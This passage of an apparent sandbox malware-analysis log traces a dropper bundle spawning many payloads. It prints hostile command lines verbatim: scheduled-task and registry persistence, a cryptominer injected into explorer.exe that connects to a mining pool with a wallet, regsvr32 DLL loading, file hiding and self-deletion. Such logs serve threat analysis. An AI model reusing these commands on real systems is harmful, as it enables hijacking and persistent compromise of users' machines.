        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:3060
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:2912
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:3108
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Modifies system certificate store
        
        PID:4072
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:2872
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:3252
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:1460
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2264
        
        C:\ProgramData\5623931.exe
        
        "C:\ProgramData\5623931.exe"
        8⤵
        Executes dropped EXE
        
        PID:1796
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1796 -s 1652
        9⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3024
        
        C:\ProgramData\5476993.exe
        
        "C:\ProgramData\5476993.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1696
        
        C:\ProgramData\5476993.exe
        
        "C:\ProgramData\5476993.exe"
        9⤵
        Executes dropped EXE
        
        PID:3848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 808
        9⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3284
        
        C:\ProgramData\7910667.exe
        
        "C:\ProgramData\7910667.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        Modifies data under HKEY_USERS
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:992
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"
        7⤵
        Executes dropped EXE
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"
        7⤵
        Executes dropped EXE
        
        PID:2176
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2176 -s 800
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        
        PID:948
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "
        9⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
        
        inst.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3352
        
        C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
        
        inst.exe
        11⤵
        Executes dropped EXE
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        12⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        13⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3576
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        14⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        15⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
        14⤵
        Creates scheduled task(s)
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\booster\booster.exe
        
        "C:\Users\Admin\AppData\Local\Temp\booster.\booster.exe"
        14⤵
        Executes dropped EXE
        
        PID:3508
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Terminal8427\hoders\kllk.vbs" /f=CREATE_NO_WINDOW install.cmd
        15⤵
        
        PID:1744
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Terminal8427\hoders\end.bat" "
        16⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 7
        17⤵
        Delays execution with timeout.exe
        
        PID:3952
        
        C:\Terminal8427\hoders\winfss.exe
        
        "winfss.exe" e -pfisiHihsd7s8ksd8 pom.rar
        17⤵
        Executes dropped EXE
        
        PID:3244
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 6
        17⤵
        Delays execution with timeout.exe
        
        PID:3408
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        17⤵
        Delays execution with timeout.exe
        
        PID:3768
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Terminal8427\hoders\1q.vbs"
        17⤵
        
        PID:3704
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Terminal8427\hoders\shellst.bat" "
        18⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Terminal8427"
        19⤵
        Views/modifies file attributes
        
        PID:3856
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        19⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Delays execution with timeout.exe
        
        PID:3540
        
        C:\Terminal8427\hoders\kerclean.exe
        
        kerclean.exe /start
        19⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:288
        
        C:\Terminal8427\hoders\kerclean.exe
        
        kerclean.exe /start
        20⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:2152
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im winfss.exe
        19⤵
        Kills process with taskkill
        
        PID:3100
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im winfss.exe
        19⤵
        Kills process with taskkill
        
        PID:3584
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\Terminal8427\hoders"
        19⤵
        Views/modifies file attributes
        
        PID:3768
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 4
        19⤵
        Executes dropped EXE
        Delays execution with timeout.exe
        
        PID:2952
        
        C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exe
        
        FoxyIDM82.exe
        10⤵
        Executes dropped EXE
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
        11⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\is-9U4JL.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9U4JL.tmp\setup_2.tmp" /SL5="$401CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\is-5BAB7.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5BAB7.tmp\setup_2.tmp" /SL5="$501CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\is-27CQN.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-27CQN.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1572
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"
        13⤵
        
        PID:2736
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"
        14⤵
        
        PID:2584
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"
        15⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dllRRKFdPhuU.dll"
        13⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dllRRKFdPhuU.dll"
        14⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe
      4⤵
      Loads dropped DLL
      PID:1752
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe
        
        Thu1170fdf4c09b1.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1684
      - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2376
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1BQfx7
        7⤵
        Modifies Internet Explorer settings
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3916
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:275457 /prefetch:2
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe
      4⤵
      Loads dropped DLL
      PID:1552
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1171b1ca5023f5d2.exe
        
        Thu1171b1ca5023f5d2.exe
        5⤵
        Executes dropped EXE
        
        PID:916
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 916 -s 800
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe
      4⤵
      Loads dropped DLL
      PID:1136
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11f1187a97f50d9c.exe
        
        Thu11f1187a97f50d9c.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1680
      - C:\Users\Admin\Documents\mrZcYGtsjX9vOMhNiai00wUQ.exe
        
        "C:\Users\Admin\Documents\mrZcYGtsjX9vOMhNiai00wUQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe
      4⤵
      Loads dropped DLL
      PID:1756
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe
        
        Thu118c8b4c3885d897d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1652
      - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe
      4⤵
      Loads dropped DLL
      PID:1380
    - - C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1189012621353ba47.exe
        
        Thu1189012621353ba47.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:688
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 948
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19392130-1637321304189820756619819120961734476501267570914-229532620677669624"
1⤵
- Loads dropped DLL
PID:988

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3492
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:3500

C:\Users\Admin\AppData\Local\Temp\CFDC.exe
C:\Users\Admin\AppData\Local\Temp\CFDC.exe
1⤵
- Executes dropped EXE
PID:2748

C:\Users\Admin\AppData\Local\Temp\13DE.exe
C:\Users\Admin\AppData\Local\Temp\13DE.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3260
- C:\Users\Admin\AppData\Local\Temp\13DE.exe
  C:\Users\Admin\AppData\Local\Temp\13DE.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2072
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:2716
- - C:\Users\Admin\AppData\Local\Temp\13DE.exe
    "C:\Users\Admin\AppData\Local\Temp\13DE.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\13DE.exe
      "C:\Users\Admin\AppData\Local\Temp\13DE.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Modifies extensions of user files
      PID:3816
    - - C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe
        
        "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:1872
      - C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe
        
        "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"
        6⤵
        Checks processor information in registry
        
        PID:3660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        
        PID:3380
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:3976
    - - C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe
        
        "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:2208
      - C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe
        
        "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"
        6⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:3456

C:\Windows\system32\taskeng.exe
taskeng.exe {1906D76F-1CFA-4475-B549-E3C1C3886F4B} S-1-5-21-2375386074-2889020035-839874990-1000:AFOWCZMM\Admin:Interactive:[1]
1⤵
PID:3572
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3560
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:2220
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2764
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2756
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      4⤵
      Creates scheduled task(s)
      PID:3844
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2100
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1588
- C:\Users\Admin\AppData\Roaming\atetbaa
  C:\Users\Admin\AppData\Roaming\atetbaa
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4036
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3492
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1664
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:588
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1236
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1652
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3328
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4088
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2492
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3980
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3272
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3676
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3644
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1096
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2668
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3112
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3408
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2412
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1744
- C:\Users\Admin\AppData\Roaming\atetbaa
  C:\Users\Admin\AppData\Roaming\atetbaa
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2804
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2424
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3412
- C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
  C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
  2⤵
  - Suspicious use of SetThreadContext
  PID:3052
- - C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
    C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
    3⤵
    PID:2284
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1448
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1684
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1940
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2712
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3872
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2208
- C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
  C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
  2⤵
  - Suspicious use of SetThreadContext
  PID:704
- - C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
    C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
    3⤵
    PID:1856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 692
      4⤵
      Program crash
      Suspicious behavior: GetForegroundWindowSpam
      PID:3672
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2752
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2656
